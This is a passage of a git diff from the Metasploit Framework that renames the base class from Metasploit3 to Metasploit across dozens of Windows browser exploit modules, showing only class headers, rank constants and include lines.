b/modules/exploits/windows/browser/logitechvideocall_start.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/lpviewer_url.rb b/modules/exploits/windows/browser/lpviewer_url.rb index 4f9d33b47f..e7d8b90841 100644 --- a/modules/exploits/windows/browser/lpviewer_url.rb +++ b/modules/exploits/windows/browser/lpviewer_url.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb index d3a8fb15d1..f3ada0ce19 100644 --- a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb +++ b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/macrovision_unsafe.rb b/modules/exploits/windows/browser/macrovision_unsafe.rb index dc41c99c65..6222cb62ad 100644 --- a/modules/exploits/windows/browser/macrovision_unsafe.rb +++ b/modules/exploits/windows/browser/macrovision_unsafe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/malwarebytes_update_exec.rb b/modules/exploits/windows/browser/malwarebytes_update_exec.rb index db740e9bdd..3f266e2401 100644 --- a/modules/exploits/windows/browser/malwarebytes_update_exec.rb +++ b/modules/exploits/windows/browser/malwarebytes_update_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking # Would be Great except MBAE doesn't version check include Msf::Exploit::EXE diff --git a/modules/exploits/windows/browser/maxthon_history_xcs.rb b/modules/exploits/windows/browser/maxthon_history_xcs.rb index 89d894554c..50d1a2d22a 100644 --- a/modules/exploits/windows/browser/maxthon_history_xcs.rb +++ b/modules/exploits/windows/browser/maxthon_history_xcs.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb index ff4cf01a15..53c6290d88 100644 --- a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb +++ b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mcafee_mvt_exec.rb b/modules/exploits/windows/browser/mcafee_mvt_exec.rb index 2d39cac1ad..698d652293 100644 --- a/modules/exploits/windows/browser/mcafee_mvt_exec.rb +++ b/modules/exploits/windows/browser/mcafee_mvt_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb index 525a9b842d..6ec8e51456 100644 --- a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb +++ b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mirc_irc_url.rb b/modules/exploits/windows/browser/mirc_irc_url.rb index e5ab64c876..9271876537 100644 --- a/modules/exploits/windows/browser/mirc_irc_url.rb +++ b/modules/exploits/windows/browser/mirc_irc_url.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_attribchildremoved.rb b/modules/exploits/windows/browser/mozilla_attribchildremoved.rb index 7cba8400bc..e54e51802a 100644 --- a/modules/exploits/windows/browser/mozilla_attribchildremoved.rb +++ b/modules/exploits/windows/browser/mozilla_attribchildremoved.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb b/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb index 06ef17e639..cab1fc1a8e 100644 --- a/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb +++ b/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb b/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb index ac509c6e3d..08b099d723 100644 --- a/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb +++ b/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_interleaved_write.rb b/modules/exploits/windows/browser/mozilla_interleaved_write.rb index 509d30f471..745da69d96 100644 --- a/modules/exploits/windows/browser/mozilla_interleaved_write.rb +++ b/modules/exploits/windows/browser/mozilla_interleaved_write.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/windows/browser/mozilla_mchannel.rb b/modules/exploits/windows/browser/mozilla_mchannel.rb index 6f5fcddffe..164371272f 100644 --- a/modules/exploits/windows/browser/mozilla_mchannel.rb +++ b/modules/exploits/windows/browser/mozilla_mchannel.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_nssvgvalue.rb b/modules/exploits/windows/browser/mozilla_nssvgvalue.rb index 287360a20a..cff6c3f7a0 100644 --- a/modules/exploits/windows/browser/mozilla_nssvgvalue.rb +++ b/modules/exploits/windows/browser/mozilla_nssvgvalue.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_nstreerange.rb b/modules/exploits/windows/browser/mozilla_nstreerange.rb index 496bbf0123..5be7e16f69 100644 --- a/modules/exploits/windows/browser/mozilla_nstreerange.rb +++ b/modules/exploits/windows/browser/mozilla_nstreerange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_reduceright.rb b/modules/exploits/windows/browser/mozilla_reduceright.rb index 7f378c62e7..db018c2cb8 100644 --- a/modules/exploits/windows/browser/mozilla_reduceright.rb +++ b/modules/exploits/windows/browser/mozilla_reduceright.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb index 068a4c1a46..69aa07f0c1 100644 --- a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb +++ b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms05_054_onload.rb b/modules/exploits/windows/browser/ms05_054_onload.rb index 300685a93e..eef5da5354 100644 --- a/modules/exploits/windows/browser/ms05_054_onload.rb +++ b/modules/exploits/windows/browser/ms05_054_onload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb index 65f8e87a6b..9555ec286d 100644 --- a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb +++ b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/ms06_013_createtextrange.rb b/modules/exploits/windows/browser/ms06_013_createtextrange.rb index 8a7966917d..93ecd04c90 100644 --- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb +++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms06_055_vml_method.rb b/modules/exploits/windows/browser/ms06_055_vml_method.rb index bf5f1f7495..1d7eb8c07d 100644 --- a/modules/exploits/windows/browser/ms06_055_vml_method.rb +++ b/modules/exploits/windows/browser/ms06_055_vml_method.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb index 16b12abc37..26f573d5ec 100644 --- a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb +++ b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms06_067_keyframe.rb b/modules/exploits/windows/browser/ms06_067_keyframe.rb index 775de5a215..d7f88606fb 100644 --- a/modules/exploits/windows/browser/ms06_067_keyframe.rb +++ b/modules/exploits/windows/browser/ms06_067_keyframe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/windows/browser/ms06_071_xml_core.rb b/modules/exploits/windows/browser/ms06_071_xml_core.rb index 98c92b6610..14dcc77255 100644 --- a/modules/exploits/windows/browser/ms06_071_xml_core.rb +++ b/modules/exploits/windows/browser/ms06_071_xml_core.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb index ebe1eb2403..1628db962c 100644 --- a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb index b53071abb3..725c81f30c 100644 --- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb +++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb index fc5f2e8ab7..251befb3e1 100644 --- a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb +++ b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb index 8834323960..0359bc1b2f 100644 --- a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb +++ b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb index 9d941bb40b..9283bb4018 100644 --- a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb +++ b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms09_002_memory_corruption.rb b/modules/exploits/windows/browser/ms09_002_memory_corruption.rb index 3f2dc970a4..1164707cec 100644 --- a/modules/exploits/windows/browser/ms09_002_memory_corruption.rb +++ b/modules/exploits/windows/browser/ms09_002_memory_corruption.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb index 4c883ed1f3..ace46aaf40 100644 --- a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb +++ b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb index 548fc18a29..40b2f28198 100644 --- a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb +++ b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms09_072_style_object.rb b/modules/exploits/windows/browser/ms09_072_style_object.rb index e31cd4d028..30271f461c 100644 --- a/modules/exploits/windows/browser/ms09_072_style_object.rb +++ b/modules/exploits/windows/browser/ms09_072_style_object.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_002_aurora.rb b/modules/exploits/windows/browser/ms10_002_aurora.rb index bb682e0e02..2120823523 100644 --- a/modules/exploits/windows/browser/ms10_002_aurora.rb +++ b/modules/exploits/windows/browser/ms10_002_aurora.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_002_ie_object.rb b/modules/exploits/windows/browser/ms10_002_ie_object.rb index 5ba8df594e..84a26a074b 100644 --- a/modules/exploits/windows/browser/ms10_002_ie_object.rb +++ b/modules/exploits/windows/browser/ms10_002_ie_object.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb index 38abad66ba..ee2b075105 100644 --- a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb +++ b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb index ef07915e4a..3ec9b12463 100644 --- a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb +++ b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb index 497cd2818f..355936fc15 100644 --- a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb +++ b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb index f6283f3c4d..eba424badf 100644 --- a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb +++ b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb index 3b272637f1..8728fdf140 100644 --- a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb +++ b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb index 76165d8a84..c1b3c90b4a 100644 --- a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb index 74898d9b7d..a98ae11881 100644 --- a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb +++ b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb index cbb1e33a3e..0d17c7c088 100644 --- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb +++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking # Need more love for Great include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb index 037424e5c5..56614e3304 100644 --- a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb +++ b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms11_081_option.rb b/modules/exploits/windows/browser/ms11_081_option.rb index 51c62c2f9b..aaecf56285 100644 --- a/modules/exploits/windows/browser/ms11_081_option.rb +++ b/modules/exploits/windows/browser/ms11_081_option.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms11_093_ole32.rb b/modules/exploits/windows/browser/ms11_093_ole32.rb index ce333b7c93..7ae5379d65 100644 --- a/modules/exploits/windows/browser/ms11_093_ole32.rb +++ b/modules/exploits/windows/browser/ms11_093_ole32.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms12_004_midi.rb b/modules/exploits/windows/browser/ms12_004_midi.rb index 22dcfc7b6a..774d2f2832 100644 --- a/modules/exploits/windows/browser/ms12_004_midi.rb +++ b/modules/exploits/windows/browser/ms12_004_midi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms12_037_ie_colspan.rb b/modules/exploits/windows/browser/ms12_037_ie_colspan.rb index de2192eb00..f994dd2c6e 100644 --- a/modules/exploits/windows/browser/ms12_037_ie_colspan.rb +++ b/modules/exploits/windows/browser/ms12_037_ie_colspan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms12_037_same_id.rb b/modules/exploits/windows/browser/ms12_037_same_id.rb index 6d6b762169..e1347a0cc1 100644 --- a/modules/exploits/windows/browser/ms12_037_same_id.rb +++ b/modules/exploits/windows/browser/ms12_037_same_id.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb index a0302f48dc..311c510e5c 100644 --- a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb +++ b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb index cb409f5da7..afba08bfa9 100644 --- a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb +++ b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb index 72a855ab3c..7cb2df0828 100644 --- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb +++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms13_055_canchor.rb b/modules/exploits/windows/browser/ms13_055_canchor.rb index bbed4c4ee0..4c11b6e440 100644 --- a/modules/exploits/windows/browser/ms13_055_canchor.rb +++ b/modules/exploits/windows/browser/ms13_055_canchor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb b/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb index 80881a1894..307c1aa501 100644 --- a/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb +++ b/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms13_069_caret.rb b/modules/exploits/windows/browser/ms13_069_caret.rb index aaf14954b6..bff2c59fb7 100644 --- a/modules/exploits/windows/browser/ms13_069_caret.rb +++ b/modules/exploits/windows/browser/ms13_069_caret.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb index dd3327be64..b83c815b82 100644 --- a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb +++ b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb index 99aa91da65..b1cd120d90 100644 --- a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb +++ b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb index 8129288d3f..b61936d5ca 100644 --- a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb +++ b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms14_012_textrange.rb b/modules/exploits/windows/browser/ms14_012_textrange.rb index b28f0dc273..65029c6b63 100644 --- a/modules/exploits/windows/browser/ms14_012_textrange.rb +++ b/modules/exploits/windows/browser/ms14_012_textrange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/msvidctl_mpeg2.rb 